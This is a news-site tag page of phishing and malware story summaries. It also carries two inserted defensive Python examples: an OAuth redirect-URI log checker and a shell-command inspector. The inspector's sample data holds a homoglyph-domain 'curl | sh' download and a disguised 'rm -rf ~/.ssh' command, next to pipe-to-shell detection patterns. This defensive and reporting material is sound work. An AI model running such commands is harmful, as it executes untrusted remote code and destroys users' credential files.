Tag

Phishing

All articles tagged with #phishing

Microsoft Stock Nudges Higher on News of New EvilTokens Phishing Attack
market-news · 2 days ago

Microsoft (MSFT) shares edged higher after TipRanks reported a new EvilTokens phishing campaign targeting Microsoft business users, with recommended protections such as limiting device-code flows and strengthening anti-phishing policies; the piece also notes Xbox sales in February (34.4M units) versus Sony’s PlayStation 5 (about 91M) and cites a Strong Buy consensus with a $581.61 price target, implying roughly 54% upside.

NFLPA Warns Agents of Fraud Scheme Targeting Players via Apple Phishing and Coerced Sex Acts
sports · 15 days ago

The NFL Players Association alerted certified agents that NFL and NBA players may have been targeted by a fraud and sex-trafficking scheme in which a man posing as an adult-film star phished players’ Apple iCloud accounts, stole credit-card information, and coerced a female victim into sex acts with athletes; the suspect, Kwamaine Jerell Ford, has been indicted on multiple counts, with prosecutors saying the operation began in 2020 while he was in federal custody. The NFLPA says all agents have a link to assess whether players were targeted and urges players to contact their agent or the NFLPA if they suspect victimization and to report to the FBI.

Perseus Android Banking Malware Expands Tactics by Monitoring Notes and Enabling Live Control
technology · 21 days ago

Security researchers warn of Perseus, a new Android banking malware evolved from Cerberus and Phoenix, distributed via phishing dropper apps and using Accessibility-based remote sessions to take over devices. It performs overlay attacks and keystroke logging, and notably monitors note apps (Google Keep, Samsung Notes, Evernote, OneNote, etc.) to exfiltrate data, while allowing operators to issue remote commands through a C2 panel (examples include scan_notes, start_vnc, click_coord) and even stream the victim’s screen. Perseus also conducts anti-analysis checks and focuses on targets in Turkey, Italy and several other European markets, highlighting a trend toward more adaptable, data-focused Android threats.

Iran-Linked Wiper Wave Targets Global Networks via Identity Attacks
technology · 29 days ago

Unit 42 warns of a rising risk of wiper attacks tied to the Iran conflict, led by Handala Hack (aka Void Manticore) using phishing and compromised admin access via Microsoft Intune to disrupt networks in Israel and the US; Israel's National Cyber Directorate reports cases where attackers used legitimate credentials to delete servers. The advisory outlines zero trust privileged access, Just-In-Time admin rights, MFA, break-glass accounts, PIM/PAM, MAA, RBAC with Intune Admin roles, and Group-based PIM; plus shorter session lifetimes, token protection, DSPM/DLP, MDR/XDR monitoring, offline immutable backups, and ongoing phishing training. If compromised, contact incident response teams.

FBI Warns of QR Code Mystery Packages Triggering Phishing Scams
technology · 1 month ago

The FBI and FTC warn about unsolicited mystery packages that include QR codes leading recipients to fraudulent sites designed to steal personal and financial information. This dangerous twist on brushing scams targets people who scan codes without verification, risking identity and financial theft. Advice from authorities includes changing passwords, enabling two-factor authentication, checking credit reports, and reporting incidents to the FBI.

AI Accelerates Cyberattacks Across the Kill Chain, Microsoft Warns
cybersecurity · 1 month ago

Microsoft's Threat Intelligence report finds threat actors are using generative AI to speed up and scale cyberattacks across the entire lifecycle—drafting phishing emails, creating malware, developing infrastructure, and fabricating realistic identities for remote‑worker schemes—while defenders should strengthen identity, detect credential abuse, and secure AI systems; the trend is echoed by Google and Amazon.

OAuth Redirect Attacks Deliver Malware and Bypass MFA
security · 1 month ago

Microsoft Defender researchers warn attackers abuse OAuth 2.0 redirect flows to bypass phishing protections by registering malicious OAuth apps and directing users to attacker-controlled redirect URIs, sometimes via PDFs; victims are taken to phishing pages or intermediaries like EvilProxy that can intercept session cookies to bypass MFA. Other campaigns deliver ZIPs with LNK files that launch PowerShell and DLL side-loading to drop payloads. These are identity-based threats exploiting standard OAuth error handling; Microsoft advises tighter OAuth permissions, stronger identity protections, Conditional Access, and cross-domain detection across email, identity, and endpoints.

Chrome Gemini Flaw Lets Attackers Hijack Camera and Microphone Through Privileged AI Panel (CVE-2026-0628)
cybersecurity · 1 month ago

Researchers from Palo Alto Networks' Unit 42 disclosed a high-severity vulnerability (CVE-2026-0628) in Chrome's Gemini AI panel that could be exploited by a malicious extension to inject code with the panel’s elevated privileges, enabling silent camera and microphone access, local file theft, screenshots, and phishing. The flaw arises from how Chrome handles the declarativeNetRequest API for gemini.google.com: content injected into that origin while it is loaded inside the Gemini panel runs with browser-level rights, unlike in a normal tab. Google patched the issue on January 5, 2026, so users should update Chrome immediately; organizations should roll the patch out across endpoints to mitigate enterprise risk from trusted-panel attacks.

OAuth Redirect Abuse Targets Government Agencies With Malware Delivery
security · 1 month ago

Microsoft warns of phishing campaigns that exploit OAuth redirect flows to bypass email and browser defenses, steering government and public-sector victims to attacker-controlled landing pages. Attackers use a malicious OAuth app with a redirect URL to rogue domains; victims authenticate, triggering ZIP-delivered payloads that execute PowerShell, DLL sideloading, and in-memory malware to reach a remote C2 server. Some campaigns also employ EvilProxy for credential interception. Defenders are advised to limit user consent, review app permissions, and remove unused or overprivileged apps.
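Both OAuth-redirect items above turn on the same detail: the phishing link points at a legitimate authorization endpoint, and it is the redirect_uri parameter, registered by the attacker's own OAuth app, that carries the victim to the rogue domain. The following is an added example (not Microsoft's code or detection logic) of the check a defender can run over proxy or URL-click logs: parse each authorize request, pull out redirect_uri, and flag any whose host is outside an allowlist. The log format, user names, client IDs, hostnames and the allowlist are all constructed for illustration.

```python
"""Flag OAuth authorize requests whose redirect_uri points outside an allowlist.

Added example for the OAuth-redirect abuse described above; not code from
Microsoft or from the reports. Log format, identities and allowlist are constructed.
"""
from urllib.parse import parse_qs, urlparse

# Constructed allowlist: hosts that legitimate redirect_uris in this tenant may use.
ALLOWED_REDIRECT_HOSTS = {"app.example-corp.com", "login.microsoftonline.com"}

# Authorization endpoints on which a redirect_uri parameter is meaningful.
AUTHORIZE_HOSTS = {"login.microsoftonline.com", "login.microsoft.com"}

# Constructed proxy log: "<timestamp> <user> <url>" per line.
SAMPLE_LOG = [
    "2026-03-01T09:12:01Z alice https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=11111111-2222-3333-4444-555555555555&response_type=code"
    "&redirect_uri=https%3A%2F%2Fapp.example-corp.com%2Fcallback&scope=openid",
    "2026-03-01T09:15:44Z bob https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee&response_type=code"
    "&redirect_uri=https%3A%2F%2Fdocs-review.example.net%2Fcb&scope=openid%20profile",
    "2026-03-01T09:16:02Z bob https://www.example-corp.com/intranet/home",
]


def parse_authorize_request(url):
    """Return (client_id, redirect_uri host) for an OAuth authorize URL, else None."""
    u = urlparse(url)
    if u.hostname not in AUTHORIZE_HOSTS:
        return None
    if "/oauth2/" not in u.path or not u.path.endswith("/authorize"):
        return None
    q = parse_qs(u.query)  # parse_qs already percent-decodes the values
    redirect = q.get("redirect_uri", [None])[0]
    if redirect is None:
        return None
    r = urlparse(redirect)
    return q.get("client_id", ["?"])[0], (r.hostname or "").lower()


def host_allowed(host):
    """True if host is an allowlisted host or a subdomain of one."""
    return any(host == a or host.endswith("." + a) for a in ALLOWED_REDIRECT_HOSTS)


def suspicious_redirects(log_lines):
    """Return one finding per authorize request whose redirect_uri host is not allowlisted."""
    findings = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue  # malformed line; skip rather than crash the sweep
        ts, user, url = parts[0], parts[1], parts[2]
        parsed = parse_authorize_request(url)
        if parsed is None:
            continue
        client_id, host = parsed
        if not host_allowed(host):
            findings.append({"ts": ts, "user": user, "client_id": client_id,
                             "redirect_host": host})
    return findings


if __name__ == "__main__":
    for f in suspicious_redirects(SAMPLE_LOG):
        print(f"{f['ts']} {f['user']} app={f['client_id']} redirect_uri host={f['redirect_host']}")
```

The flagged client_id is the pivot for response: look the app registration up in the tenant, check who consented and when, and revoke or block it; the redirect host goes to the proxy blocklist. Subdomain matching in host_allowed is deliberate so that a legitimate wildcard deployment does not page the on-call, but it also means an allowlisted apex domain must itself be trustworthy.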

Phishing PWA Poses as Google Security Page to Steal OTPs and Proxy Victims’ Traffic
technology · 1 month ago

A phishing campaign disguises a fake Google Security page as a Progressive Web App to trick users into granting permissions. The malicious PWA can exfiltrate one-time passwords, clipboard contents, contacts, and GPS data, and can proxy the victim’s browser traffic and scan internal networks via a WebSocket relay. An Android APK is also distributed to extend access with keystroke capture and device admin persistence. The attack relies on social engineering, not exploiting a vulnerability. Google says security checks aren’t done via pop-ups; remove the PWA and revoke device admin rights following Malwarebytes’ removal guidance.

Iran Cyber Escalation Intensifies as Connectivity Fails and Hacktivists Rise
technology · 1 month ago

Following the Feb 28, 2026 U.S.–Israel strikes, Iran’s cyber posture has shifted amid severe internet outages that likely constrain state-aligned actors, while hacktivist groups and other threat actors expand globally with low-to-medium impact activities (DDoS, data leaks, phishing). Unit 42 observes active phishing via a malicious Android app and notes a surge in cyber activism tied to an “Electronic Operations Room.” Defensive guidance emphasizes offline backups, out-of-band verification, patching internet-facing assets, phishing awareness, IP geofencing, and robust incident response; multi-layer defense and ongoing updates from cyber authorities are advised as activity remains fluid.

AI-Driven Threats Blur the Line Between Daily Activity and Breach
technology · 1 month ago

ThreatsDay flags AI-enhanced threats accelerating breaches and blurring into everyday activity: Kali Linux now integrates Claude via MCP for natural-language command execution; campaigns include Bitpanda phishing, four-minute lateral movement, and Mac/WinRAR exploits, aided by ad cloaking, typosquatting, and social engineering, as threat actors fragment post-RAMP and increasingly use AI-driven tactics.

Microsoft Exchange Online mislabels legitimate emails as phishing due to new URL rule
technology · 2 months ago

Microsoft says an ongoing Exchange Online incident is caused by a new URL rule that erroneously flags legitimate messages as phishing and quarantines them, disrupting mail flow. The company is reviewing quarantined emails and working to unblock legitimate URLs, with some users potentially seeing previously flagged messages delivered as remediation proceeds; Microsoft has not provided scope or regional impact details yet.

Tirith Locks Down Shell Commands to Stop Imposter Homoglyph Attacks
security · 2 months ago

A new open-source, cross-platform tool called Tirith hooks into major shells to inspect pasted commands for dangerous URLs and other homoglyph tricks, blocking execution locally with sub-millisecond overhead. It defends against homograph domains, terminal injections, pipe-to-shell patterns, dotfile hijacking, insecure transports, supply-chain risks, and credential exposure, while performing analysis offline and without telemetry. It supports Windows, Linux, and macOS and can be installed via Homebrew, apt/dnf, npm, Cargo, Nix, Scoop, Chocolatey, and Docker. It does not hook cmd.exe and has limited independent testing at publication.
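To make concrete what a pre-execution hook of this kind has to look at, here is an added example (my own illustration, not Tirith's code or its rule set) that inspects a pasted command for three of the classes listed above: a hostname that mixes or hides Unicode scripts (homograph domain), a download piped straight into a shell, a plain-http transport, and control or zero-width characters that can hide part of a command from the terminal. The sample commands, including the Cyrillic look-alike domain, are constructed.

```python
"""Inspect a shell command before it runs, in the spirit of the tool described above.

Added example; not Tirith's code. Sample commands are constructed.
"""
import re
import unicodedata

URL_RE = re.compile(r"(https?)://([^\s/'\"<>|]+)")
# "| sh", "| bash", "| sudo bash", "| zsh" and similar right after a fetch.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sudo\s+)?(ba|z|k|da)?sh\b")
FETCH_RE = re.compile(r"\b(curl|wget)\b")
# Zero-width characters, bidi overrides (U+202A-E, U+2066-9) and raw ESC.
HIDDEN_RE = re.compile("[\u200b-\u200f\u202a-\u202e\u2066-\u2069\x1b]")

CYR_O = "\u043e"  # Cyrillic small letter o, visually identical to Latin 'o'
SAMPLE_COMMANDS = [
    f"curl -fsSL https://g{CYR_O}{CYR_O}gle.com/install.sh | sh",
    "wget http://mirror.example.org/tool.sh -O tool.sh",
    "curl -O https://example.com/file.tar.gz",
    "echo 'hello'\u200b && rm -rf ~/.ssh",
]


def hostname_scripts(host):
    """Unicode scripts of the alphabetic characters in host (e.g. {'LATIN', 'CYRILLIC'})."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in host if ch.isalpha()}


def punycode(host):
    """ASCII (xn--) form of host, which is what the browser or resolver actually sees."""
    try:
        return host.encode("idna").decode("ascii")
    except UnicodeError:
        return "<not encodable>"


def analyze_command(cmd):
    """Return a list of (finding_kind, detail) tuples; empty means nothing suspicious."""
    findings = []
    for scheme, authority in URL_RE.findall(cmd):
        host = authority.split("@")[-1].split(":")[0].lower()  # drop userinfo and port
        if scheme == "http":
            findings.append(("insecure-transport", host))
        if not host.isascii():
            findings.append(("homoglyph-domain",
                             f"{host} scripts={sorted(hostname_scripts(host))} "
                             f"punycode={punycode(host)}"))
    if FETCH_RE.search(cmd) and PIPE_TO_SHELL_RE.search(cmd):
        findings.append(("pipe-to-shell", cmd))
    if HIDDEN_RE.search(cmd):
        findings.append(("hidden-chars",
                         " ".join(f"U+{ord(c):04X}" for c in HIDDEN_RE.findall(cmd))))
    return findings


def should_block(cmd):
    """Policy: block on any finding; a real hook would prompt the user instead."""
    return bool(analyze_command(cmd))


if __name__ == "__main__":
    for c in SAMPLE_COMMANDS:
        print(repr(c))
        for kind, detail in analyze_command(c):
            print(f"  [{kind}] {detail}")
```

The homograph check is intentionally blunt: any non-ASCII hostname is reported together with the scripts it mixes and its punycode form, because the punycode is what the user would have had to recognise and did not. A shell hook can afford that because the false-positive cost is one confirmation prompt; a mail gateway could not.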

Shadow Campaigns expands global espionage reach to 37 countries
technology · 2 months ago

A state-sponsored actor tracked as TGR-STA-1030/UNC6619, dubbed Shadow Campaigns, has compromised government and critical-infrastructure networks in 37 countries since early 2024, with reconnaissance activity touching 155 nations. The operation uses tailored phishing with a Diaoyu loader, exploits across multiple platforms, and a toolkit including Cobalt Strike, VShell, web shells, and a Linux kernel rootkit named ShadowGuard. It relies on legitimate VPS and proxy infrastructure and targets ministries, energy, finance, and diplomatic agencies, with activity intensifying around political events like elections. Unit 42 provides IoCs to help defenders detect and block these attacks.